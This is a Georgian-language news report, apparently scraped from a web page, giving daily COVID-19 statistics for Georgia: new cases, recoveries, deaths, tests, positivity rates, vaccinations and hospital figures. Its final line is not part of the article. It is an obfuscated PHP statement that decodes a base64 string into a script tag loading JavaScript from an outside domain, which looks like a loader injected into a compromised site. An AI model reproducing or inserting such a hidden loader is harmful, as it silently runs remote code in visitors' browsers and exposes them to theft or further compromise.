celsiusi
ავერსი შნაიდერი
საქართველოში კორონავირუსის 12 101 ახალი შემთხვევა გამოვლინდა. ამის შესახებ ინფორმაცია მთავრობის სპეციალურ ვებგვერდ stopcov.ge-ზე ცოტა ხნის წინ განახლდა.
 
ქვეყანაში ბოლო 24 საათში 14 764 ადამიანი გამოჯანმრთელდა. ბოლო დღე-ღამეში კორონავირუსით გარდაიცვალა 45 პაციენტი.
 
ბოლო 24 საათში ქვეყანაში ჩატარდა 47 486 ტესტი, მათ შორის ანტიგენის სწრაფი ტესტით – 33 164, „პისიარ“ ტესტით – 14 322.
 
ქვეყანაში კორონავირუსის გამოვლენის დადებითობის მაჩვენებლებია: დღიური – 25,48%, ბოლო 14 დღის – 30,65%, ბოლო შვიდი დღის – 28,55%.
 
საქართველოში კორონავირუსით ინფიცირების სულ 1 565 769 შემთხვევაა გამოვლენილი, მათგან 1 422 540 გამოჯანმრთელდა, 15 933 კი გარდაიცვალა.
 
სულ ჩატარდა 2 800 752 აცრა, დღიურად აცრილია 3 006.
 
კარანტინის რეჟიმშია 7, სტაციონარში მეთვალყურეობას 5 358 ადამიანი გადის, კლინიკურ სასტუმროში იმყოფება 860 პირი.
 
ამასთან, 21 თებერვლის მდგომარეობით, საქართველოში კორონავირუსის 4 775 ახალი შემთხვევა გამოვლინდა, გამოჯანმრთელდა 19 242 პაციენტი, გარდაიცვალა 32.
 
 
754
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");